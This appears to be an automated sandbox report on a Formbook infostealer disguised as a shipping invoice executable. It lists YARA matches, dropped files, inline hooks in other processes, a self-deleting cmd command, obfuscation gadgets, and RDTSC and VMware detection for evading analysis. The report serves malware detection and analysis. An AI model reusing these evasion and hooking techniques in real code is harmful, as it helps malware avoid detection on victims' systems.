Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_10006325	1_2_10006325
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_0041CB17	2_2_0041CB17
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_0041CB1A	2_2_0041CB1A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_0041B466	2_2_0041B466
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00408C2B	2_2_00408C2B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00408C30	2_2_00408C30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00402D87	2_2_00402D87
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B30D20	2_2_04B30D20
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04C01D55	2_2_04C01D55
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B56E30	2_2_04B56E30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B4B090	2_2_04B4B090
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04BF1002	2_2_04BF1002
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B54120	2_2_04B54120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B3F900	2_2_04B3F900
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B6EBB0	2_2_04B6EBB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372AB40	9_2_0372AB40
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037ACB4F	9_2_037ACB4F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D2B28	9_2_037D2B28
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A309	9_2_0372A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037B23E3	9_2_037B23E3
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C03DA	9_2_037C03DA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373ABD8	9_2_0373ABD8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037CDBD2	9_2_037CDBD2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373EBB0	9_2_0373EBB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373138B	9_2_0373138B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B236	9_2_0372B236
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037BFA2B	9_2_037BFA2B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4AEF	9_2_037C4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D22AE	9_2_037D22AE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03724120	9_2_03724120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0370F900	9_2_0370F900
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037299BF	9_2_037299BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372A830	9_2_0372A830
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037DE824	9_2_037DE824
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1002	9_2_037C1002
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D28EC	9_2_037D28EC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037320A0	9_2_037320A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D20A8	9_2_037D20A8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371B090	9_2_0371B090
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D1FF1	9_2_037D1FF1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037DDFCE	9_2_037DDFCE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03726E30	9_2_03726E30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037CD616	9_2_037CD616
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D2EF7	9_2_037D2EF7
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D1D55	9_2_037D1D55
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03700D20	9_2_03700D20
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D2D07	9_2_037D2D07
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371D5E0	9_2_0371D5E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D25DD	9_2_037D25DD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03732581	9_2_03732581
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C2D82	9_2_037C2D82
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B477	9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037CD466	9_2_037CD466
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371841F	9_2_0371841F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496	9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F7CB17	9_2_02F7CB17
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F7CB1A	9_2_02F7CB1A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F62FB0	9_2_02F62FB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F7B466	9_2_02F7B466
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F68C30	9_2_02F68C30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F68C2B	9_2_02F68C2B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F62D90	9_2_02F62D90
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F62D87	9_2_02F62D87

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\netsh.exe

Code function: String function: 0370B150 appears 136 times

PE file contains strange resources

Source: Shipping INVOICE-BL Shipment..exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Shipping INVOICE-BL Shipment..exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DevCfgUI.dll.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST

PE file does not import any functions

Source: DevCfgUI.dll.0.dr

Static PE information: No import functions for PE file found

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\rundll32.exe

Section loaded: sfc.dll

Jump to behavior

Yara signature match

Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@9/27@11/6

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 1_2_100019C0 Cremaster,CertOpenSystemStoreA,EqualSid,FlushFileBuffers,GetWindowThreadProcessId,ReleaseSemaphore,LoadBitmapA,ScrollDC,SetScrollPos,HeapDestroy,ReadFile,

1_2_100019C0

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

0_2_004033A9

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

Code function: 0_2_00404686 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_00404686

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

Code function: 0_2_00402138 CoCreateInstance,MultiByteToWideChar,

0_2_00402138

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

File created: C:\Users\user\AppData\Roaming\pkgs

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5732:120:WilError_01

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

File created: C:\Users\user\AppData\Local\Temp\nse53A6.tmp

Jump to behavior

Source: Shipping INVOICE-BL Shipment..exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Prehnite,Lychnises

Source: Shipping INVOICE-BL Shipment..exe	Virustotal: Detection: 27%
Source: Shipping INVOICE-BL Shipment..exe	ReversingLabs: Detection: 44%

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

File read: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe 'C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe'
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Prehnite,Lychnises
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: unknown	Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe Prehnite,Lychnises	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'	Jump to behavior

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Shipping INVOICE-BL Shipment..exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: vjscsvr.pdb source: nse53A7.tmp.0.dr
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.703909995.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: f:\binaries.x86ret\bin\i386\VC7\VCPackages\1033\rcxdtiui.pdb source: rcxditui.dll.0.dr
Source:	Binary string: netsh.pdb source: cmd.exe, 00000002.00000002.737580402.0000000004990000.00000040.00000001.sdmp
Source:	Binary string: f:\RTM\vsproject\xmake\Framework\objr\i386\Microsoft.Build.Framework.pdb$ source: MSBuildFramework.dll.0.dr
Source:	Binary string: netsh.pdbGCTL source: cmd.exe, 00000002.00000002.737580402.0000000004990000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: cmd.exe, 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, netsh.exe, 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp
Source:	Binary string: cmd.pdbUGP source: netsh.exe, 00000009.00000002.914476844.00000000032B5000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdb source: cmd.exe, netsh.exe
Source:	Binary string: f:\RTM\vsproject\xmake\Framework\objr\i386\Microsoft.Build.Framework.pdb source: MSBuildFramework.dll.0.dr
Source:	Binary string: y:\components\cpp\ufls\crtowords\es\UniRelease\crtowords_es.pdbQ" source: nse53A7.tmp.0.dr
Source:	Binary string: f:\binaries.x86ret\bin\i386\VC7\VCPackages\1033\dbsvcui.pdb source: nse53A7.tmp.0.dr
Source:	Binary string: cmd.pdb source: netsh.exe, 00000009.00000002.914476844.00000000032B5000.00000004.00000020.sdmp
Source:	Binary string: MakeCert.pdb source: makecert.exe.0.dr
Source:	Binary string: guidgen.pdb source: guidgen.exe.0.dr
Source:	Binary string: y:\components\cpp\ufls\crtowords\es\UniRelease\crtowords_es.pdb source: nse53A7.tmp.0.dr
Source:	Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.703909995.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

1_2_1000734B

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_100046E5 push ecx; ret	1_2_100046F8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_0041C952 push es; ret	2_2_0041C954
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_0041B375 push eax; ret	2_2_0041B3C8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_0041B3C2 push eax; ret	2_2_0041B3C8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_0041B3CB push eax; ret	2_2_0041B432
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00409412 push ss; ret	2_2_00409415
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_0041B42C push eax; ret	2_2_0041B432
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00414D93 push 5C0B9774h; iretd	2_2_00414DBA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_00414EE9 push ebp; ret	2_2_00414F0A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 2_2_04B8D0D1 push ecx; ret	2_2_04B8D0E4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0375D0D1 push ecx; ret	9_2_0375D0E4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F7B3C2 push eax; ret	9_2_02F7B3C8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F7B3CB push eax; ret	9_2_02F7B432
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F7B375 push eax; ret	9_2_02F7B3C8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F7C952 push es; ret	9_2_02F7C954
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F74EE9 push ebp; ret	9_2_02F74F0A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F7B42C push eax; ret	9_2_02F7B432
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F69412 push ss; ret	9_2_02F69415
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02F74D93 push 5C0B9774h; iretd	9_2_02F74DBA

Persistence and Installation Behavior:

Drops PE files

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	File created: C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	File created: C:\Users\user\AppData\Local\Temp\medium\listadmin\glance_config\eDbgJitUI.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	File created: C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	File created: C:\Users\user\AppData\Local\Temp\special_offers\dirb\123\dbsvcui.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	File created: C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	File created: C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	File created: C:\Users\user\AppData\Roaming\panel\box\xbox\msvsotbcct.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	File created: C:\Users\user\AppData\Local\Temp\Prehnite.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	File created: C:\Users\user\AppData\Roaming\pkgs\rcxditui.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	File created: C:\Users\user\AppData\Roaming\pkgs\vjscsvr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	File created: C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1748 base: 77165050 value: E9 EB 61 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1748 base: 771650F0 value: E9 5B 61 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1748 base: 77165180 value: E9 9B 60 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1748 base: 77165190 value: E9 CB 60 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1748 base: 771651A0 value: E9 4B 60 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1748 base: 7717FEE0 value: E9 9B FF FF FF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1748 base: 771133C0 value: E9 FB 6F 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1748 base: 77114760 value: E9 2B 6B 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1748 base: 770D6590 value: E9 0B 00 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1748 base: 770DB510 value: E9 2B 53 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1748 base: 770FC490 value: E9 0B 00 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1748 base: 7711EE00 value: E9 E1 52 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 1748 base: 7711EFD0 value: E9 26 5B 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 77165050 value: E9 EB 61 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 771650F0 value: E9 5B 61 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 77165180 value: E9 9B 60 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 77165190 value: E9 CB 60 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 771651A0 value: E9 4B 60 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 7717FEE0 value: E9 9B FF FF FF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 771133C0 value: E9 FB 6F 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 77114760 value: E9 2B 6B 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 770D6590 value: E9 0B 00 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 770DB510 value: E9 2B 53 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 770FC490 value: E9 0B 00 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 7711EE00 value: E9 E1 52 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 7711EFD0 value: E9 26 5B 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6360 base: 77165050 value: E9 EB 61 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6360 base: 771650F0 value: E9 5B 61 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6360 base: 77165180 value: E9 9B 60 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6360 base: 77165190 value: E9 CB 60 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6360 base: 771651A0 value: E9 4B 60 FB FF	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6360 base: 7717FEE0 value: E9 9B FF FF FF	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6360 base: 771133C0 value: E9 FB 6F 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6360 base: 77114760 value: E9 2B 6B 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6360 base: 770D6590 value: E9 0B 00 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6360 base: 770DB510 value: E9 2B 53 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6360 base: 770FC490 value: E9 0B 00 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6360 base: 7711EE00 value: E9 E1 52 00 00	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 6360 base: 7711EFD0 value: E9 26 5B 00 00	Jump to behavior

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\SysWOW64\cmd.exe	RDTSC instruction interceptor: First address: 00000000004085C4 second address: 00000000004085CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe	RDTSC instruction interceptor: First address: 000000000040894E second address: 0000000000408954 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 0000000002F685C4 second address: 0000000002F685CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 0000000002F6894E second address: 0000000002F68954 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 2_2_00408880 rdtsc

2_2_00408880

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\medium\listadmin\glance_config\eDbgJitUI.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exe	Jump to dropped file
